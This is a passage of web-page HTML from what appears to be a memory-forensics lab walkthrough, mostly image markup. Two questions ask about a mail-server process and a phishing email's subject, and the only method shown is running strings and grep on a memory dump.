href="https://substackcdn.com/image/fetch/$s_!Nya4!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d5129f0-a894-4eec-a779-c1c446535752_799x589.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Nya4!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d5129f0-a894-4eec-a779-c1c446535752_799x589.png 424w, https://substackcdn.com/image/fetch/$s_!Nya4!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d5129f0-a894-4eec-a779-c1c446535752_799x589.png 848w, https://substackcdn.com/image/fetch/$s_!Nya4!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d5129f0-a894-4eec-a779-c1c446535752_799x589.png 1272w, https://substackcdn.com/image/fetch/$s_!Nya4!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d5129f0-a894-4eec-a779-c1c446535752_799x589.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Nya4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d5129f0-a894-4eec-a779-c1c446535752_799x589.png" width="799" height="589" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1d5129f0-a894-4eec-a779-c1c446535752_799x589.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:589,&quot;width&quot;:799,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:28233,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Nya4!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d5129f0-a894-4eec-a779-c1c446535752_799x589.png 424w, https://substackcdn.com/image/fetch/$s_!Nya4!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d5129f0-a894-4eec-a779-c1c446535752_799x589.png 848w, https://substackcdn.com/image/fetch/$s_!Nya4!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d5129f0-a894-4eec-a779-c1c446535752_799x589.png 1272w, https://substackcdn.com/image/fetch/$s_!Nya4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d5129f0-a894-4eec-a779-c1c446535752_799x589.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Cm7g!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73ad59cc-0a18-457e-be92-0ad30fcf05fe_470x475.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Cm7g!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73ad59cc-0a18-457e-be92-0ad30fcf05fe_470x475.png 424w, https://substackcdn.com/image/fetch/$s_!Cm7g!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73ad59cc-0a18-457e-be92-0ad30fcf05fe_470x475.png 848w, https://substackcdn.com/image/fetch/$s_!Cm7g!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73ad59cc-0a18-457e-be92-0ad30fcf05fe_470x475.png 1272w, https://substackcdn.com/image/fetch/$s_!Cm7g!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73ad59cc-0a18-457e-be92-0ad30fcf05fe_470x475.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Cm7g!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73ad59cc-0a18-457e-be92-0ad30fcf05fe_470x475.png" width="470" height="475" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/73ad59cc-0a18-457e-be92-0ad30fcf05fe_470x475.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:475,&quot;width&quot;:470,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:63316,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Cm7g!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73ad59cc-0a18-457e-be92-0ad30fcf05fe_470x475.png 424w, https://substackcdn.com/image/fetch/$s_!Cm7g!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73ad59cc-0a18-457e-be92-0ad30fcf05fe_470x475.png 848w, https://substackcdn.com/image/fetch/$s_!Cm7g!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73ad59cc-0a18-457e-be92-0ad30fcf05fe_470x475.png 1272w, https://substackcdn.com/image/fetch/$s_!Cm7g!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73ad59cc-0a18-457e-be92-0ad30fcf05fe_470x475.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!OwvQ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff5975f26-a6c0-4931-8190-fcffa26f82fc_2528x144.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!OwvQ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff5975f26-a6c0-4931-8190-fcffa26f82fc_2528x144.png 424w, https://substackcdn.com/image/fetch/$s_!OwvQ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff5975f26-a6c0-4931-8190-fcffa26f82fc_2528x144.png 848w, https://substackcdn.com/image/fetch/$s_!OwvQ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff5975f26-a6c0-4931-8190-fcffa26f82fc_2528x144.png 1272w, https://substackcdn.com/image/fetch/$s_!OwvQ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff5975f26-a6c0-4931-8190-fcffa26f82fc_2528x144.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!OwvQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff5975f26-a6c0-4931-8190-fcffa26f82fc_2528x144.png" width="1456" height="83" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f5975f26-a6c0-4931-8190-fcffa26f82fc_2528x144.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:83,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:41024,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!OwvQ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff5975f26-a6c0-4931-8190-fcffa26f82fc_2528x144.png 424w, https://substackcdn.com/image/fetch/$s_!OwvQ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff5975f26-a6c0-4931-8190-fcffa26f82fc_2528x144.png 848w, https://substackcdn.com/image/fetch/$s_!OwvQ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff5975f26-a6c0-4931-8190-fcffa26f82fc_2528x144.png 1272w, https://substackcdn.com/image/fetch/$s_!OwvQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff5975f26-a6c0-4931-8190-fcffa26f82fc_2528x144.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!pdnA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57d33419-9aff-439e-a811-ce459ea3d5af_2541x835.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!pdnA!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57d33419-9aff-439e-a811-ce459ea3d5af_2541x835.png 424w, https://substackcdn.com/image/fetch/$s_!pdnA!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57d33419-9aff-439e-a811-ce459ea3d5af_2541x835.png 848w, https://substackcdn.com/image/fetch/$s_!pdnA!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57d33419-9aff-439e-a811-ce459ea3d5af_2541x835.png 1272w, https://substackcdn.com/image/fetch/$s_!pdnA!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57d33419-9aff-439e-a811-ce459ea3d5af_2541x835.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!pdnA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57d33419-9aff-439e-a811-ce459ea3d5af_2541x835.png" width="1456" height="478" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/57d33419-9aff-439e-a811-ce459ea3d5af_2541x835.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:478,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:95823,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!pdnA!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57d33419-9aff-439e-a811-ce459ea3d5af_2541x835.png 424w, https://substackcdn.com/image/fetch/$s_!pdnA!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57d33419-9aff-439e-a811-ce459ea3d5af_2541x835.png 848w, https://substackcdn.com/image/fetch/$s_!pdnA!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57d33419-9aff-439e-a811-ce459ea3d5af_2541x835.png 1272w, https://substackcdn.com/image/fetch/$s_!pdnA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57d33419-9aff-439e-a811-ce459ea3d5af_2541x835.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!kYbh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F03fe1424-f087-43cf-ba19-cbeba7e1e7ad_2541x835.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!kYbh!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F03fe1424-f087-43cf-ba19-cbeba7e1e7ad_2541x835.png 424w, https://substackcdn.com/image/fetch/$s_!kYbh!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F03fe1424-f087-43cf-ba19-cbeba7e1e7ad_2541x835.png 848w, https://substackcdn.com/image/fetch/$s_!kYbh!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F03fe1424-f087-43cf-ba19-cbeba7e1e7ad_2541x835.png 1272w, https://substackcdn.com/image/fetch/$s_!kYbh!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F03fe1424-f087-43cf-ba19-cbeba7e1e7ad_2541x835.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!kYbh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F03fe1424-f087-43cf-ba19-cbeba7e1e7ad_2541x835.png" width="1456" height="478" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/03fe1424-f087-43cf-ba19-cbeba7e1e7ad_2541x835.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:478,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!kYbh!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F03fe1424-f087-43cf-ba19-cbeba7e1e7ad_2541x835.png 424w, https://substackcdn.com/image/fetch/$s_!kYbh!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F03fe1424-f087-43cf-ba19-cbeba7e1e7ad_2541x835.png 848w, https://substackcdn.com/image/fetch/$s_!kYbh!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F03fe1424-f087-43cf-ba19-cbeba7e1e7ad_2541x835.png 1272w, https://substackcdn.com/image/fetch/$s_!kYbh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F03fe1424-f087-43cf-ba19-cbeba7e1e7ad_2541x835.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>14. What process allowed the attacker to send phishing emails?</strong></p><p>Using strings and grep on the memory dump helps identify a mail server process.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!jTE7!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff90b36c0-49ca-4283-9906-2011f36d11a9_900x603.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!jTE7!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff90b36c0-49ca-4283-9906-2011f36d11a9_900x603.png 424w, https://substackcdn.com/image/fetch/$s_!jTE7!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff90b36c0-49ca-4283-9906-2011f36d11a9_900x603.png 848w, https://substackcdn.com/image/fetch/$s_!jTE7!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff90b36c0-49ca-4283-9906-2011f36d11a9_900x603.png 1272w, https://substackcdn.com/image/fetch/$s_!jTE7!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff90b36c0-49ca-4283-9906-2011f36d11a9_900x603.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!jTE7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff90b36c0-49ca-4283-9906-2011f36d11a9_900x603.png" width="900" height="603" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f90b36c0-49ca-4283-9906-2011f36d11a9_900x603.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:603,&quot;width&quot;:900,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!jTE7!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff90b36c0-49ca-4283-9906-2011f36d11a9_900x603.png 424w, https://substackcdn.com/image/fetch/$s_!jTE7!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff90b36c0-49ca-4283-9906-2011f36d11a9_900x603.png 848w, https://substackcdn.com/image/fetch/$s_!jTE7!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff90b36c0-49ca-4283-9906-2011f36d11a9_900x603.png 1272w, https://substackcdn.com/image/fetch/$s_!jTE7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff90b36c0-49ca-4283-9906-2011f36d11a9_900x603.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>15. What is the phishing email&#8217;s subject?</strong></p><p>Running strings and searching for "Subject:" extracts the email subject line.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Z0uP!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347a12-1da4-4bc3-b0ad-7ebc02573785_717x102.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 